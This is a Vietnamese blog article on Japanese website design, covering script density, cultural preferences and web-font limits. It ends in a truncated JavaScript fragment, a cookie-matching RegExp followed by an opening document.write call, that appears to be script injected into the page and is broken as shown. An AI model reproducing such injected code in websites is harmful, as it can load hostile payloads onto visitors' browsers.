Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Phong cách thiết kế website của Nhật Bản

Phong cách thiết kế website của Nhật Bản

Nhật Bản là 1 trong những quốc gia hàng đầu thế giới về khoa học công nghệ, kỹ thuật, giáo dục… Nhưng trong lĩnh vực thiết kế web thì có thể nhận thấy có quá nhiều khác biệt và đa phần là không được đánh giá cao so với xu hướng chung.

Hãy xem thử 1 vài website Nhật Bản:

……….

thiet_ke_web_Nhat_24

Bạn thấy sao, tôi thì thấy đúng là nó khác biệt nhưng mà trông khá xấu về mặt giao diện và có cảm giác nó như những website thời kỳ những năm cuối thập niên 90.

Chữ thì chi chít, màu sắc thì lòe loẹt, sắp xếp nhồi nhét các phần từ với nhau cảm giác như 1 tờ rao vặt.

Vậy tại sao lại có sự khác biệt này, có lẽ vì 1 số lý do sau đây:

 

1. Ngôn ngữ và chữ:

Tiếng Nhật cũng như tiếng Trung là ngôn ngữ tượng hình gồm nhiều nét, khi chúng kết hợp với nhau sẽ tạo thành những từ tốn ít không gian nhưng mang nhiều ý nghĩa. Một dòng chữ tiếng Nhật ngắn nhưng có thể chứa đựng nhiều thông tin.

Người Nhật không có chữ nghiêng hay chữ hoa những thứ khiến cho bản chữ cái latin cần thêm hiển thị. Điều này khiến chúng khó tạo ra độ tương phản hình học giúp cho việc sắp xếp chữ như làm typography.

thiet_ke_web_Nhat_2

2. Ảnh hưởng của văn hóa:

Văn hóa Nhật Bản luôn thể hiện sự tối ưu, tránh xa sự lãng phí, ví dụ trong ẩm thực hay nhà cửa họ luôn sắp đặt rất tỉ mỉ, tối ưu. Vì thế, điều này cũng có ảnh hưởng đến thiết kế web, họ muốn mọi tận dụng mọi khoảng trống có thể. Đó là lý do tại sao bạn sẽ hiếm khi nhìn thấy không gian trắng trong thiết kế web Nhật, thay vào đó là chi chít những câu chữ hình ảnh.

Người Nhật rất cẩn thận và thận trọng trong hành vi của mình. Nên các trang web cần thuyết phục khách hàng bằng việc cung cấp chi tiết thông tin 1 cách nhanh chóng. So với các khách hàng châu Âu, người tiêu dùng Nhật yêu cầu nhiều thông tin cụ thể hơn về sản phẩm, dịch vụ trước khi mua. Vì vậy, các thiết kế web Nhật rất tận dụng việc thể hiện ngay càng nhiều câu chữ càng tốt.

Ngoài ra Nhật Bản là đất nước có nền văn hóa khá chuộng màu sắc sặc sỡ, điều đó thể hiện ở thời trang, manga, anime… Nó ảnh hưởng khá nhiều lên các website, trong 1 website có thể có rất nhiều màu, thậm chí các màu tương phản.

thiet_ke_web_Nhat_05

3. Hạ tầng kỹ thuật:

Người Nhật sử dụng internet khá sớm và trên nền web mobile cực nhiều. Vì vậy cái họ cần nhất khi duyệt web là tốc độ và mượt mà. Do đó tối ưu văn bản, hình ảnh là việc cần thiết, ko cần phải quá cầu kỳ, hiển thị text không cũng được…

Web Fonts – Sự thiếu hụt của phông chữ không phải latin cho web (tiếng Nhật, Trung, Hàn…). Và mỗi phông chữ đòi hỏi hàng ngàn chữ cái được thiết kế dẫn đến thời gian tải về khá lâu. Vì lý do này, các nhà thiết kế có xu hướng sử dụng hình ảnh thay vì những đoạn chữ để thể hiện những mặt chữ không phổ biến.

 

(St)

 

 

  (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘